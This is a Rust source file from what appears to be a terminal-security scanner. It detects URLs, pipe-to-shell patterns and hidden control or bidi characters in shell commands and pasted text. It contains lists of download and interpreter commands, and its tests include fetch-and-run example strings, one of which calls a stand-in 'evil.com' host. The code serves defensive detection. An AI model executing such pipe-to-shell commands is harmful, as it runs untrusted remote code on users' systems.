Skip to main content

tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7/// Context for Tier 1 scanning.
8#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10    /// Exec-time: command about to be executed (check subcommand).
11    Exec,
12    /// Paste-time: content being pasted (paste subcommand).
13    Paste,
14}
15
16// Include generated Tier 1 patterns from build.rs declarative pattern table.
17#[allow(dead_code)]
18mod tier1_generated {
19    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22/// Expose the build-time extractor IDs for test-time cross-referencing.
23pub fn extractor_ids() -> &'static [&'static str] {
24    tier1_generated::EXTRACTOR_IDS
25}
26
27/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
28static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
29    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
30});
31
32/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
33static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
34    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
35});
36
37/// Standard URL extraction regex for Tier 3.
38static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
39    Regex::new(
40        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
41    )
42    .expect("url regex must compile")
43});
44
45/// Control character patterns for paste-time byte scanning.
46pub struct ByteScanResult {
47    pub has_ansi_escapes: bool,
48    pub has_control_chars: bool,
49    pub has_bidi_controls: bool,
50    pub has_zero_width: bool,
51    pub has_invalid_utf8: bool,
52    pub details: Vec<ByteFinding>,
53}
54
55pub struct ByteFinding {
56    pub offset: usize,
57    pub byte: u8,
58    pub description: String,
59}
60
61/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
62pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63    match context {
64        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66    }
67}
68
69/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
70pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71    let mut result = ByteScanResult {
72        has_ansi_escapes: false,
73        has_control_chars: false,
74        has_bidi_controls: false,
75        has_zero_width: false,
76        has_invalid_utf8: false,
77        details: Vec::new(),
78    };
79
80    // Check for invalid UTF-8
81    if std::str::from_utf8(input).is_err() {
82        result.has_invalid_utf8 = true;
83    }
84
85    let len = input.len();
86    let mut i = 0;
87    while i < len {
88        let b = input[i];
89
90        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
91        if b == 0x1b {
92            if i + 1 < len {
93                let next = input[i + 1];
94                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95                    result.has_ansi_escapes = true;
96                    result.details.push(ByteFinding {
97                        offset: i,
98                        byte: b,
99                        description: match next {
100                            b'[' => "CSI escape sequence",
101                            b']' => "OSC escape sequence",
102                            b'_' => "APC escape sequence",
103                            b'P' => "DCS escape sequence",
104                            _ => "escape sequence",
105                        }
106                        .to_string(),
107                    });
108                    i += 2;
109                    continue;
110                }
111            } else {
112                // Trailing lone ESC
113                result.has_ansi_escapes = true;
114                result.details.push(ByteFinding {
115                    offset: i,
116                    byte: b,
117                    description: "trailing escape byte".to_string(),
118                });
119            }
120        }
121
122        // Control characters (< 0x20, excluding common whitespace and ESC)
123        if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124            result.has_control_chars = true;
125            result.details.push(ByteFinding {
126                offset: i,
127                byte: b,
128                description: format!("control character 0x{b:02x}"),
129            });
130        }
131
132        // DEL character
133        if b == 0x7F {
134            result.has_control_chars = true;
135            result.details.push(ByteFinding {
136                offset: i,
137                byte: b,
138                description: "control character 0x7f (DEL)".to_string(),
139            });
140        }
141
142        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
143        if b >= 0xc0 {
144            // Try to decode UTF-8 character
145            let remaining = &input[i..];
146            if let Some(ch) = std::str::from_utf8(remaining)
147                .ok()
148                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149                .and_then(|s| s.chars().next())
150            {
151                // Bidi controls
152                if is_bidi_control(ch) {
153                    result.has_bidi_controls = true;
154                    result.details.push(ByteFinding {
155                        offset: i,
156                        byte: b,
157                        description: format!("bidi control U+{:04X}", ch as u32),
158                    });
159                }
160                // Zero-width characters
161                if is_zero_width(ch) {
162                    result.has_zero_width = true;
163                    result.details.push(ByteFinding {
164                        offset: i,
165                        byte: b,
166                        description: format!("zero-width character U+{:04X}", ch as u32),
167                    });
168                }
169                i += ch.len_utf8();
170                continue;
171            }
172        }
173
174        i += 1;
175    }
176
177    result
178}
179
180/// Check if a character is a bidi control.
181fn is_bidi_control(ch: char) -> bool {
182    matches!(
183        ch,
184        '\u{200E}' // LRM
185        | '\u{200F}' // RLM
186        | '\u{202A}' // LRE
187        | '\u{202B}' // RLE
188        | '\u{202C}' // PDF
189        | '\u{202D}' // LRO
190        | '\u{202E}' // RLO
191        | '\u{2066}' // LRI
192        | '\u{2067}' // RLI
193        | '\u{2068}' // FSI
194        | '\u{2069}' // PDI
195    )
196}
197
198/// Check if a character is zero-width.
199fn is_zero_width(ch: char) -> bool {
200    matches!(
201        ch,
202        '\u{200B}' // ZWSP
203        | '\u{200C}' // ZWNJ
204        | '\u{200D}' // ZWJ
205        | '\u{FEFF}' // BOM / ZWNBSP
206    )
207}
208
209/// Tier 3: Extract URL-like patterns from a command string.
210/// Uses shell-aware tokenization, then extracts URLs from each segment.
211pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212    let segments = tokenize::tokenize(input, shell);
213    let mut results = Vec::new();
214
215    for (seg_idx, segment) in segments.iter().enumerate() {
216        // Extract standard URLs from raw text
217        for mat in URL_REGEX.find_iter(&segment.raw) {
218            let raw = mat.as_str().to_string();
219            let url = parse::parse_url(&raw);
220            results.push(ExtractedUrl {
221                raw,
222                parsed: url,
223                segment_index: seg_idx,
224                in_sink_context: is_sink_context(segment, &segments),
225            });
226        }
227
228        // Check for schemeless URLs in sink contexts
229        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
230        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231            let cmd_lower = cmd.to_lowercase();
232            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233        });
234        if is_sink_context(segment, &segments) && !is_docker_cmd {
235            for arg in &segment.args {
236                let clean = strip_quotes(arg);
237                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238                    results.push(ExtractedUrl {
239                        raw: clean.clone(),
240                        parsed: UrlLike::SchemelessHostPath {
241                            host: extract_host_from_schemeless(&clean),
242                            path: extract_path_from_schemeless(&clean),
243                        },
244                        segment_index: seg_idx,
245                        in_sink_context: true,
246                    });
247                }
248            }
249        }
250
251        // Check for Docker refs in docker commands
252        if let Some(cmd) = &segment.command {
253            let cmd_lower = cmd.to_lowercase();
254            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255                if let Some(docker_subcmd) = segment.args.first() {
256                    let subcmd_lower = docker_subcmd.to_lowercase();
257                    if subcmd_lower == "build" {
258                        // For build, only -t/--tag values are image refs
259                        let mut i = 1;
260                        while i < segment.args.len() {
261                            let arg = strip_quotes(&segment.args[i]);
262                            if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263                                let tag_val = strip_quotes(&segment.args[i + 1]);
264                                if !tag_val.is_empty() {
265                                    let docker_url = parse::parse_docker_ref(&tag_val);
266                                    results.push(ExtractedUrl {
267                                        raw: tag_val,
268                                        parsed: docker_url,
269                                        segment_index: seg_idx,
270                                        in_sink_context: true,
271                                    });
272                                }
273                                i += 2;
274                            } else if arg.starts_with("-t") && arg.len() > 2 {
275                                let tag_val = strip_quotes(&arg[2..]);
276                                let docker_url = parse::parse_docker_ref(&tag_val);
277                                results.push(ExtractedUrl {
278                                    raw: tag_val,
279                                    parsed: docker_url,
280                                    segment_index: seg_idx,
281                                    in_sink_context: true,
282                                });
283                                i += 1;
284                            } else if let Some(val) = arg.strip_prefix("--tag=") {
285                                let tag_val = strip_quotes(val);
286                                let docker_url = parse::parse_docker_ref(&tag_val);
287                                results.push(ExtractedUrl {
288                                    raw: tag_val,
289                                    parsed: docker_url,
290                                    segment_index: seg_idx,
291                                    in_sink_context: true,
292                                });
293                                i += 1;
294                            } else {
295                                i += 1;
296                            }
297                        }
298                    } else if subcmd_lower == "image" {
299                        // docker image pull/push/inspect — actual subcmd is args[1]
300                        if let Some(image_subcmd) = segment.args.get(1) {
301                            let image_subcmd_lower = image_subcmd.to_lowercase();
302                            if matches!(
303                                image_subcmd_lower.as_str(),
304                                "pull" | "push" | "inspect" | "rm" | "tag"
305                            ) {
306                                extract_first_docker_image(
307                                    &segment.args[2..],
308                                    seg_idx,
309                                    &mut results,
310                                );
311                            }
312                        }
313                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314                        // First non-flag arg is image, then stop
315                        extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316                    }
317                }
318            }
319        }
320    }
321
322    results
323}
324
325/// An extracted URL with context.
326#[derive(Debug, Clone)]
327pub struct ExtractedUrl {
328    pub raw: String,
329    pub parsed: UrlLike,
330    pub segment_index: usize,
331    pub in_sink_context: bool,
332}
333
334/// Common value-taking flags across docker subcommands.
335const DOCKER_VALUE_FLAGS: &[&str] = &[
336    "--platform",
337    "--format",
338    "--filter",
339    "-f",
340    "--label",
341    "-l",
342    "--name",
343    "--hostname",
344    "--user",
345    "-u",
346    "--workdir",
347    "-w",
348    "--network",
349    "--net",
350    "--env",
351    "-e",
352    "--env-file",
353    "--publish",
354    "-p",
355    "--expose",
356    "--volume",
357    "-v",
358    "--mount",
359    "--add-host",
360    "--device",
361    "--entrypoint",
362    "--log-driver",
363    "--log-opt",
364    "--restart",
365    "--runtime",
366    "--cpus",
367    "--cpu-shares",
368    "--cpu-quota",
369    "--memory",
370    "--memory-reservation",
371    "--memory-swap",
372    "--shm-size",
373    "--ulimit",
374    "--security-opt",
375    "--sysctl",
376    "--tmpfs",
377    "--gpus",
378    "--ipc",
379    "--pid",
380    "--userns",
381    "--cgroupns",
382];
383
384/// Short flags that may embed their value inline (e.g., -p8080:80).
385const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
386
387/// Extract the first non-flag argument as a Docker image reference.
388fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
389    let mut skip_next = false;
390    for arg in args {
391        if skip_next {
392            skip_next = false;
393            continue;
394        }
395        let clean = strip_quotes(arg);
396        if clean == "--" {
397            break;
398        }
399        if clean.starts_with("--") && clean.contains('=') {
400            continue; // --flag=value, skip
401        }
402        if clean.starts_with('-') {
403            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
404                skip_next = true;
405            }
406            if DOCKER_VALUE_PREFIXES
407                .iter()
408                .any(|p| clean.starts_with(p) && clean.len() > p.len())
409            {
410                continue;
411            }
412            continue;
413        }
414        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
415            let docker_url = parse::parse_docker_ref(&clean);
416            results.push(ExtractedUrl {
417                raw: clean,
418                parsed: docker_url,
419                segment_index: seg_idx,
420                in_sink_context: true,
421            });
422        }
423        break; // Only first non-flag arg is the image
424    }
425}
426
427/// Check if a segment is in a "sink" context (executing/downloading).
428fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
429    if let Some(cmd) = &segment.command {
430        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
431        let cmd_lower = cmd_base.to_lowercase();
432        if is_source_command(&cmd_lower) {
433            return true;
434        }
435    }
436
437    // Check if this segment pipes into a sink
438    if let Some(sep) = &segment.preceding_separator {
439        if sep == "|" || sep == "|&" {
440            // This segment receives piped input — check if it's an interpreter
441            if let Some(cmd) = &segment.command {
442                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
443                if is_interpreter(cmd_base) {
444                    return true;
445                }
446            }
447        }
448    }
449
450    false
451}
452
453fn is_source_command(cmd: &str) -> bool {
454    matches!(
455        cmd,
456        "curl"
457            | "wget"
458            | "fetch"
459            | "scp"
460            | "rsync"
461            | "git"
462            | "ssh"
463            | "docker"
464            | "podman"
465            | "nerdctl"
466            | "pip"
467            | "pip3"
468            | "npm"
469            | "npx"
470            | "yarn"
471            | "pnpm"
472            | "go"
473            | "cargo"
474            | "iwr"
475            | "irm"
476            | "invoke-webrequest"
477            | "invoke-restmethod"
478    )
479}
480
481fn is_interpreter(cmd: &str) -> bool {
482    matches!(
483        cmd,
484        "sh" | "bash"
485            | "zsh"
486            | "dash"
487            | "ksh"
488            | "python"
489            | "python3"
490            | "node"
491            | "perl"
492            | "ruby"
493            | "php"
494            | "iex"
495            | "invoke-expression"
496    )
497}
498
499fn strip_quotes(s: &str) -> String {
500    let s = s.trim();
501    if s.len() >= 2
502        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
503    {
504        s[1..s.len() - 1].to_string()
505    } else {
506        s.to_string()
507    }
508}
509
510fn looks_like_schemeless_host(s: &str) -> bool {
511    // Must contain a dot, not start with -, not be a flag
512    if s.starts_with('-') || !s.contains('.') {
513        return false;
514    }
515    // First component before / or end should look like a domain
516    let host_part = s.split('/').next().unwrap_or(s);
517    if !host_part.contains('.') || host_part.contains(' ') {
518        return false;
519    }
520    // Exclude args where the host part looks like a file (e.g., "install.sh")
521    // Only check the host part (before first /), not the full string with path
522    let file_exts = [
523        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
524        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
525        ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
526        ".conf", ".cfg", ".ini", ".toml",
527    ];
528    let host_lower = host_part.to_lowercase();
529    if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
530        return false;
531    }
532    // Must have at least 2 labels (e.g., "example.com" not just "file.txt")
533    let labels: Vec<&str> = host_part.split('.').collect();
534    if labels.len() < 2 {
535        return false;
536    }
537    // Last label (TLD) should be 2-6 alphabetic chars
538    let tld = labels.last().unwrap();
539    tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
540}
541
542fn extract_host_from_schemeless(s: &str) -> String {
543    s.split('/').next().unwrap_or(s).to_string()
544}
545
546fn extract_path_from_schemeless(s: &str) -> String {
547    if let Some(idx) = s.find('/') {
548        s[idx..].to_string()
549    } else {
550        String::new()
551    }
552}
553
554#[cfg(test)]
555mod tests {
556    use super::*;
557
558    #[test]
559    fn test_tier1_exec_matches_url() {
560        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
561    }
562
563    #[test]
564    fn test_tier1_exec_no_match_simple() {
565        assert!(!tier1_scan("ls -la", ScanContext::Exec));
566    }
567
568    #[test]
569    fn test_tier1_exec_no_match_echo() {
570        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
571    }
572
573    #[test]
574    fn test_tier1_exec_matches_pipe_bash() {
575        assert!(tier1_scan("something | bash", ScanContext::Exec));
576    }
577
578    #[test]
579    fn test_tier1_exec_matches_pipe_sudo_bash() {
580        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
581    }
582
583    #[test]
584    fn test_tier1_exec_matches_pipe_env_bash() {
585        assert!(tier1_scan("something | env bash", ScanContext::Exec));
586    }
587
588    #[test]
589    fn test_tier1_exec_matches_pipe_bin_bash() {
590        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
591    }
592
593    #[test]
594    fn test_tier1_exec_matches_git_scp() {
595        assert!(tier1_scan(
596            "git clone git@github.com:user/repo",
597            ScanContext::Exec
598        ));
599    }
600
601    #[test]
602    fn test_tier1_exec_matches_punycode() {
603        assert!(tier1_scan(
604            "curl https://xn--example-cua.com",
605            ScanContext::Exec
606        ));
607    }
608
609    #[test]
610    fn test_tier1_exec_matches_docker() {
611        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
612    }
613
614    #[test]
615    fn test_tier1_exec_matches_iwr() {
616        assert!(tier1_scan(
617            "iwr https://evil.com/script.ps1",
618            ScanContext::Exec
619        ));
620    }
621
622    #[test]
623    fn test_tier1_exec_matches_curl() {
624        assert!(tier1_scan(
625            "curl https://example.com/install.sh",
626            ScanContext::Exec
627        ));
628    }
629
630    #[test]
631    fn test_tier1_exec_matches_lookalike_tld() {
632        assert!(tier1_scan("open file.zip", ScanContext::Exec));
633    }
634
635    #[test]
636    fn test_tier1_exec_matches_shortener() {
637        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
638    }
639
640    #[test]
641    fn test_tier1_paste_matches_non_ascii() {
642        assert!(tier1_scan("café", ScanContext::Paste));
643    }
644
645    #[test]
646    fn test_tier1_paste_exec_patterns_also_match() {
647        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
648    }
649
650    #[test]
651    fn test_tier1_exec_no_non_ascii() {
652        // Non-ASCII should NOT trigger exec-time scan
653        assert!(!tier1_scan("echo café", ScanContext::Exec));
654    }
655
656    #[test]
657    fn test_byte_scan_ansi() {
658        let input = b"hello \x1b[31mred\x1b[0m world";
659        let result = scan_bytes(input);
660        assert!(result.has_ansi_escapes);
661    }
662
663    #[test]
664    fn test_byte_scan_control_chars() {
665        let input = b"hello\rworld";
666        let result = scan_bytes(input);
667        assert!(result.has_control_chars);
668    }
669
670    #[test]
671    fn test_byte_scan_bidi() {
672        let input = "hello\u{202E}dlrow".as_bytes();
673        let result = scan_bytes(input);
674        assert!(result.has_bidi_controls);
675    }
676
677    #[test]
678    fn test_byte_scan_zero_width() {
679        let input = "hel\u{200B}lo".as_bytes();
680        let result = scan_bytes(input);
681        assert!(result.has_zero_width);
682    }
683
684    #[test]
685    fn test_byte_scan_clean() {
686        let input = b"hello world\n";
687        let result = scan_bytes(input);
688        assert!(!result.has_ansi_escapes);
689        assert!(!result.has_control_chars);
690        assert!(!result.has_bidi_controls);
691        assert!(!result.has_zero_width);
692    }
693
694    #[test]
695    fn test_extract_urls_basic() {
696        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
697        assert_eq!(urls.len(), 1);
698        assert_eq!(urls[0].raw, "https://example.com/install.sh");
699    }
700
701    #[test]
702    fn test_extract_urls_pipe() {
703        let urls = extract_urls(
704            "curl https://example.com/install.sh | bash",
705            ShellType::Posix,
706        );
707        assert!(!urls.is_empty());
708        assert!(urls[0].in_sink_context);
709    }
710
711    #[test]
712    fn test_extract_urls_scp() {
713        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
714        assert!(!urls.is_empty());
715        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
716    }
717
718    #[test]
719    fn test_extract_docker_ref() {
720        let urls = extract_urls("docker pull nginx", ShellType::Posix);
721        let docker_urls: Vec<_> = urls
722            .iter()
723            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
724            .collect();
725        assert_eq!(docker_urls.len(), 1);
726    }
727
728    #[test]
729    fn test_extract_powershell_iwr() {
730        let urls = extract_urls(
731            "iwr https://example.com/script.ps1 | iex",
732            ShellType::PowerShell,
733        );
734        assert!(!urls.is_empty());
735    }
736
737    #[test]
738    fn test_strip_quotes_single_char() {
739        assert_eq!(strip_quotes("\""), "\"");
740        assert_eq!(strip_quotes("'"), "'");
741    }
742
743    #[test]
744    fn test_strip_quotes_empty() {
745        assert_eq!(strip_quotes(""), "");
746    }
747
748    #[test]
749    fn test_scan_bytes_bel_vt_del() {
750        // BEL (0x07)
751        let input = b"hello\x07world";
752        let result = scan_bytes(input);
753        assert!(result.has_control_chars);
754
755        // VT (0x0B)
756        let input = b"hello\x0Bworld";
757        let result = scan_bytes(input);
758        assert!(result.has_control_chars);
759
760        // FF (0x0C)
761        let input = b"hello\x0Cworld";
762        let result = scan_bytes(input);
763        assert!(result.has_control_chars);
764
765        // DEL (0x7F)
766        let input = b"hello\x7Fworld";
767        let result = scan_bytes(input);
768        assert!(result.has_control_chars);
769    }
770
771    #[test]
772    fn test_scan_bytes_osc_apc_dcs() {
773        // OSC: \e]
774        let input = b"hello\x1b]0;title\x07world";
775        let result = scan_bytes(input);
776        assert!(result.has_ansi_escapes);
777
778        // APC: \e_
779        let input = b"hello\x1b_dataworld";
780        let result = scan_bytes(input);
781        assert!(result.has_ansi_escapes);
782
783        // DCS: \eP
784        let input = b"hello\x1bPdataworld";
785        let result = scan_bytes(input);
786        assert!(result.has_ansi_escapes);
787    }
788
789    #[test]
790    fn test_schemeless_long_tld() {
791        assert!(looks_like_schemeless_host("example.academy"));
792        assert!(looks_like_schemeless_host("example.photography"));
793    }
794
795    #[test]
796    fn test_segment_index_correct() {
797        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
798        // Each URL should have the segment index of the segment it came from
799        for url in &urls {
800            // segment_index should be 0 or 1, not an incrementing counter
801            assert!(url.segment_index <= 1);
802        }
803    }
804
805    #[test]
806    fn test_docker_build_context_not_image() {
807        let urls = extract_urls("docker build .", ShellType::Posix);
808        let docker_urls: Vec<_> = urls
809            .iter()
810            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
811            .collect();
812        assert_eq!(
813            docker_urls.len(),
814            0,
815            "build context '.' should not be treated as image"
816        );
817    }
818
819    #[test]
820    fn test_docker_image_subcmd() {
821        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
822        let docker_urls: Vec<_> = urls
823            .iter()
824            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
825            .collect();
826        assert_eq!(docker_urls.len(), 1);
827    }
828
829    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
830    /// that all generated fragment counts are positive.
831    /// This is a module boundary enforcement test — ensures no secret
832    /// extractors exist outside the declarative pattern table.
833    #[test]
834    fn test_tier1_module_boundary_enforcement() {
835        // Verify extractor IDs are generated
836        let ids = tier1_generated::EXTRACTOR_IDS;
837        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
838        // Verify exec and paste fragment counts
839        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
840        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
841        assert!(exec_count > 0, "Must have exec fragments");
842        assert!(
843            paste_count >= exec_count,
844            "Paste fragments must be superset of exec fragments"
845        );
846        // Verify the generated patterns are valid regexes
847        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
848            .expect("Generated exec pattern must be valid regex");
849        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
850            .expect("Generated paste pattern must be valid regex");
851    }
852}